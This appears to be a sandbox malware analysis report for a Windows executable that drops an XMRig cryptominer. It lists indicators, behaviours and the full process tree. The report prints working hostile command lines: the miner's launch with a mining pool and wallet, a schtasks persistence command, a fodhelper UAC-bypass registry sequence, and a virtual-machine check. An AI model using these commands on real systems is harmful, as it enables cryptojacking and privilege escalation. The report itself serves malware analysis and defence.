Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/10/2024, 11:47
Static task
static1
Behavioral task
behavioral1
Sample
425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
Resource
win7-20240903-en
General
-
Target
425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
-
Size
7.8MB
-
MD5
38be83afea1e906c05e5b851253cbc6a
-
SHA1
85841044836479ac3c0b9fb7f1f28928621a4a99
-
SHA256
425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
-
SHA512
17334120d971f389db66d529e76f4385948723868bbaeb3dda45ef0988167f11288fdf65d976179889f13bbea128dd9b768e515a91f18ad2812770020d9b68f7
-
SSDEEP
196608:UB4i/VIa9g50YQjhHTbq7kGFco1JMdMZoWtz+oeT4wBYR5+Pmk+uy:U6aK6ZSFco1JtZDt+b4F5Hk+u
Malware Config
Signatures
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral2/memory/4772-47-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-49-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-52-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-54-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-53-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-51-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-55-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4772-58-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe -
Executes dropped EXE 4 IoCs
pid Process 2184 paint.exe 2576 FodhelperBypassUAC.exe 2504 services64.exe 3576 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1648 set thread context of 4772 1648 conhost.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings FodhelperBypassUAC.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell FodhelperBypassUAC.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command\ = "cmd.exe" FodhelperBypassUAC.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command\DelegateExecute FodhelperBypassUAC.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command FodhelperBypassUAC.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell FodhelperBypassUAC.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command FodhelperBypassUAC.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open FodhelperBypassUAC.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open FodhelperBypassUAC.exe Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings FodhelperBypassUAC.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3092 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 512 conhost.exe 1648 conhost.exe 1648 conhost.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe 4772 explorer.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1604 WMIC.exe Token: SeSecurityPrivilege 1604 WMIC.exe Token: SeTakeOwnershipPrivilege 1604 WMIC.exe Token: SeLoadDriverPrivilege 1604 WMIC.exe Token: SeSystemProfilePrivilege 1604 WMIC.exe Token: SeSystemtimePrivilege 1604 WMIC.exe Token: SeProfSingleProcessPrivilege 1604 WMIC.exe Token: SeIncBasePriorityPrivilege 1604 WMIC.exe Token: SeCreatePagefilePrivilege 1604 WMIC.exe Token: SeBackupPrivilege 1604 WMIC.exe Token: SeRestorePrivilege 1604 WMIC.exe Token: SeShutdownPrivilege 1604 WMIC.exe Token: SeDebugPrivilege 1604 WMIC.exe Token: SeSystemEnvironmentPrivilege 1604 WMIC.exe Token: SeRemoteShutdownPrivilege 1604 WMIC.exe Token: SeUndockPrivilege 1604 WMIC.exe Token: SeManageVolumePrivilege 1604 WMIC.exe Token: 33 1604 WMIC.exe Token: 34 1604 WMIC.exe Token: 35 1604 WMIC.exe Token: 36 1604 WMIC.exe Token: SeIncreaseQuotaPrivilege 1604 WMIC.exe Token: SeSecurityPrivilege 1604 WMIC.exe Token: SeTakeOwnershipPrivilege 1604 WMIC.exe Token: SeLoadDriverPrivilege 1604 WMIC.exe Token: SeSystemProfilePrivilege 1604 WMIC.exe Token: SeSystemtimePrivilege 1604 WMIC.exe Token: SeProfSingleProcessPrivilege 1604 WMIC.exe Token: SeIncBasePriorityPrivilege 1604 WMIC.exe Token: SeCreatePagefilePrivilege 1604 WMIC.exe Token: SeBackupPrivilege 1604 WMIC.exe Token: SeRestorePrivilege 1604 WMIC.exe Token: SeShutdownPrivilege 1604 WMIC.exe Token: SeDebugPrivilege 1604 WMIC.exe Token: SeSystemEnvironmentPrivilege 1604 WMIC.exe Token: SeRemoteShutdownPrivilege 1604 WMIC.exe Token: SeUndockPrivilege 1604 WMIC.exe Token: SeManageVolumePrivilege 1604 WMIC.exe Token: 33 1604 WMIC.exe Token: 34 1604 WMIC.exe Token: 35 1604 WMIC.exe Token: 36 1604 WMIC.exe Token: SeDebugPrivilege 512 conhost.exe Token: SeDebugPrivilege 1648 conhost.exe Token: SeLockMemoryPrivilege 4772 explorer.exe Token: SeLockMemoryPrivilege 4772 explorer.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 4804 wrote to memory of 1644 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 86 PID 4804 wrote to memory of 1644 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 86 PID 4804 wrote to memory of 2184 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 88 PID 4804 wrote to memory of 2184 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 88 PID 4804 wrote to memory of 2576 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 89 PID 4804 wrote to memory of 2576 4804 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe 89 PID 2576 wrote to memory of 4156 2576 FodhelperBypassUAC.exe 90 PID 2576 wrote to memory of 4156 2576 FodhelperBypassUAC.exe 90 PID 1644 wrote to memory of 1604 1644 cmd.exe 92 PID 1644 wrote to memory of 1604 1644 cmd.exe 92 PID 1644 wrote to memory of 872 1644 cmd.exe 93 PID 1644 wrote to memory of 872 1644 cmd.exe 93 PID 4156 wrote to memory of 1172 4156 cmd.exe 94 PID 4156 wrote to memory of 1172 4156 cmd.exe 94 PID 1172 wrote to memory of 1784 1172 fodhelper.exe 96 PID 1172 wrote to memory of 1784 1172 fodhelper.exe 96 PID 2184 wrote to memory of 512 2184 paint.exe 98 PID 2184 wrote to memory of 512 2184 paint.exe 98 PID 2184 wrote to memory of 512 2184 paint.exe 98 PID 512 wrote to memory of 1056 512 conhost.exe 99 PID 512 wrote to memory of 1056 512 conhost.exe 99 PID 1056 wrote to memory of 3092 1056 cmd.exe 101 PID 1056 wrote to memory of 3092 1056 cmd.exe 101 PID 512 wrote to memory of 920 512 conhost.exe 102 PID 512 wrote to memory of 920 512 conhost.exe 102 PID 920 wrote to memory of 2504 920 cmd.exe 104 PID 920 wrote to memory of 2504 920 cmd.exe 104 PID 2504 wrote to memory of 1648 2504 services64.exe 105 PID 2504 wrote to memory of 1648 2504 services64.exe 105 PID 2504 wrote to memory of 1648 2504 services64.exe 105 PID 1648 wrote to memory of 3576 1648 conhost.exe 106 PID 1648 wrote to memory of 3576 1648 conhost.exe 106 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 1648 wrote to memory of 4772 1648 conhost.exe 107 PID 3576 wrote to memory of 2452 3576 sihost64.exe 108 PID 3576 wrote to memory of 2452 3576 sihost64.exe 108 PID 3576 wrote to memory of 2452 3576 sihost64.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe"C:\Users\Admin\AppData\Local\Temp\425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get Model3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"3⤵PID:872
-
-
-
C:\Users\Admin\AppData\Local\Temp\paint.exe"C:\Users\Admin\AppData\Local\Temp\paint.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\paint.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵PID:2452
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FodhelperBypassUAC.exe"C:\Users\Admin\AppData\Local\Temp\FodhelperBypassUAC.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\cmd.exe/c C:\Windows\System32\fodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\System32\fodhelper.exeC:\Windows\System32\fodhelper.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.exe"cmd.exe"5⤵PID:1784
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
11KB
MD59eb62648c9cc2f1edd3e9cef736f9c5c
SHA16ddd252a86f1184c57f6c3624a36543dde0e9fbc
SHA256991a39a81f86da3ee222e4832edfbeb6a2b9ac182243e868d34094669cff3971
SHA5120f0a3b29384dc557d5efa20d801159ba495ae63399ff3af925bb4b099b1855fe3acfb782871c2b50fc68032ad6cf70f307e87dc34321f1be408c7c041d409e92
-
Filesize
5.0MB
MD521986423b4fadce84294b0357b589099
SHA13009cf439a166ed1e44ad5d67e42626d7998b3d0
SHA256a420a6a98959a1ff28f81054e0a04c1e9e95361d9cebf2f92fdacd9b3a8709a6
SHA5120cbc3255ba1760d0d6faaa116b36c2efd5a74e69f0e362ac3d82ebff6fae46b8e63137557adeb7f80bb56ff8e823c903a0d41058a430ae461108febe78dfe0e9
-
Filesize
2.1MB
MD59ca610eb2f785c8d2ddf2a50347039ed
SHA1db44eda1468ee8fac51c88bc0d3298826cb22dc5
SHA2560404b99e5df31ab12b2abdb9aa805e1adef3936b8a0b234f601e5aee11289655
SHA512864a98a7e7f69b4945d424a0c6b3ab43e3292e1783392a398c175a7ca34f32e97aaacaf0db1913a80fe67353e385a7c2fdf01389bda7e12a5dd8c248cd472bb5
-
Filesize
30KB
MD561d09675a406e39f17f2ea03a3cb8ccc
SHA1ed3b8e75d6fa0b61a3e18bd308f61647a7abe161
SHA25643702440b1cb03293360d7012333845039b807b50c6f187c9e6ccdad1d65da89
SHA512e5964e6e4ca28bce1396ed66a220099922e66338813b0b1d13a2306fe0b338e4cfb157444b4a11640a8916410c43379b54ed244fca009316522b67cde98d41f3